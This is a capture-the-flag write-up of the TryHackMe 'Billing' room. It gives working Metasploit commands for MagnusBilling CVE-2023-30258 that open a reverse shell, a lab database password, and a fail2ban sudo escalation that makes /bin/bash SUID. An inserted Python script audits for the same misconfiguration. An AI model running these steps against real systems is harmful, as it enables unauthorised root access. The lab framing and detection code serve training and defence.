Today, we're setting sail into the Billing room on TryHackMe, where our mission is to navigate through vulnerabilities, uncover flags and claim root access! 💀⚔️
Reconnaissance - Scouting the Enemy 🚀
Every great conquest starts with intelligence gathering. A thorough network scan helps identify open services and potential entry points.
I use Nmap for this task:
r1pp3r 🔱 god2eye ~/Documents/tryhackme/billing
λ nmap -sC -sV 10.10.137.233 | tee nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 12:52 IST
Nmap scan report for 10.10.137.233
Host is up (0.35s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 79:ba:5d:23:35:b2:f0:25:d7:53:5e:c5:b9:af:c0:cc (RSA)
| 256 4e:c3:34:af:00:b7:35:bc:9f:f5:b0:d2:aa:35:ae:34 (ECDSA)
|_ 256 26:aa:17:e0:c8:2a:c9:d9:98:17:e4:8f:87:73:78:4d (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
| http-title: MagnusBilling
|_Requested resource was http://10.10.137.233/mbilling/
|_http-server-header: Apache/2.4.56 (Debian)
| http-robots.txt: 1 disallowed entry
|_/mbilling/
3306/tcp open mysql MariaDB (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.45 seconds
🕵️ Findings:
22/tcp - OpenSSH 8.4p1 (Debian)
80/tcp - Apache 2.4.56 hosting a web application (/mbilling/)
The presence of /mbilling/ suggests the system is running MagnusBilling, a widely used VoIP billing platform. This discovery guides our next steps towards web exploitation.
Initial Access - Breaking In! 🏴‍☠️
Exploiting MagnusBilling (CVE-2023-30258)
Time to fire up Metasploit 🔥
msfconsole
search magnusbilling
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
set RHOSTS <machine_ip>
set LHOST <attacker_ip>
set LPORT 6969
exploit
🎯 Boom! We're in!
The exploit executes successfully 🎉, handing us a Meterpreter shell 💻
Let’s stabilize our foothold and get comfy:
meterpreter > shell
which python3
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
asterisk@Billing:/var/www/html/mbilling/lib/icepay$ cd /home/magnus
asterisk@Billing:/home/magnus$ cat user.txt
[REDACTED]
Retrieving the user flag! Yo-ho-ho! Let's press on. 🏴‍☠️
With access as magnus, we begin system enumeration and credential discovery.
Privilege Escalation - Climbing the Ladder 🏆
Hunting for Credentials and Misconfigurations
A deep dive into configuration files often yields useful information. Looking into key application settings, we find potential credentials:
cd /var/www/html/mbilling/protected/config
cat main.php
Additionally, another configuration file linked to Asterisk contains database credentials:
cat /etc/asterisk/res_config_mysql.conf
Extracted credentials—💰 Jackpot!
dbuser = mbillingUser
dbpass = BLOGYwvtJkI7uaX5
Sadly, no instant root access. I continued exploring for privilege escalation paths—our journey is far from over! 🔥
Checking sudo privileges:
asterisk@Billing:/home$ sudo -l
Matching Defaults entries for asterisk on Billing:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
Observation:
🎯 Bingo! The asterisk user can execute /usr/bin/fail2ban-client as root without a password.
By modifying fail2ban’s SSH action, we introduce a SUID backdoor:
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client status
Status
|- Number of jail: 8
`- Jail list: ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban 'chmod +s /bin/bash'
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client get sshd action iptables-multiport actionban
chmod +s /bin/bash
asterisk@Billing:/home$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.4
1
Verifying changes:
asterisk@Billing:/home$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1234376 Mar 27 2022 /bin/bash
Executing /bin/bash -p now elevates us to root. 🚀 Now, let’s take the throne!
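As an added defender-side example (not part of the original write-up), the script below audits the three conditions this privilege-escalation chain depends on: a NOPASSWD sudo rule for fail2ban-client with no argument restriction, a jail actionban that no longer references the banned address, and a SUID bit on /bin/bash. The sudo -l and ls samples are constructed from the output above; the hardened sudoers line is an assumption about one way to narrow the rule.

```python
"""Audit helpers for the fail2ban-client sudo misconfiguration shown in this room."""
import re

# Binaries whose sub-commands end up running arbitrary commands as root:
# fail2ban-client's 'set <jail> action <name> actionban <cmd>' stores a command
# that the fail2ban daemon later executes as root on the next ban.
COMMAND_EXECUTING_BINARIES = {"/usr/bin/fail2ban-client"}

# Constructed sample, copied from the sudo -l output above (one command per line).
SUDO_L_SAMPLE = """\
User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
"""

# Assumed hardened rule: a fixed argument list means sudo only permits exactly
# 'fail2ban-client status', not the 'set ... actionban' sub-command.
SUDO_L_HARDENED = """\
User asterisk may run the following commands on Billing:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client status
"""

# Matches a sudo -l rule line: (runas) [TAG: ...] /path/to/cmd [args]
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$"
)


def audit_sudo_rules(sudo_l_output: str) -> list[tuple[str, bool]]:
    """Return (command, nopasswd) for rules that grant an unrestricted
    command-executing binary; argument-restricted rules are not flagged."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m["tags"].replace(":", "").split()
        if m["cmd"] in COMMAND_EXECUTING_BINARIES and m["args"].strip() == "":
            findings.append((m["cmd"], "NOPASSWD" in tags))
    return findings


def actionban_is_suspicious(actionban: str) -> bool:
    """A genuine ban command references the banned address via fail2ban's <ip>
    tag; a value such as 'chmod +s /bin/bash' bans nothing and is tampering."""
    return "<ip>" not in actionban


def listing_has_suid(ls_line: str) -> bool:
    """True when the owner-execute slot of an 'ls -l' mode string is s/S (SUID)."""
    mode = ls_line.split()[0]
    return len(mode) >= 10 and mode[3] in "sS"
```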
This exercise highlights the real-world attack chain used to compromise a vulnerable system.
Final words? Stay sharp, keep hacking, and always test your defenses! ⚔️🔥
Happy hacking, fellow pirates! 🏴☠️💻
A quick OSINT search reveals that MagnusBilling has an unauthenticated Remote Command Execution (RCE) vulnerability (CVE-2023-30258, used above). Leveraging this flaw provides our entry point into the system.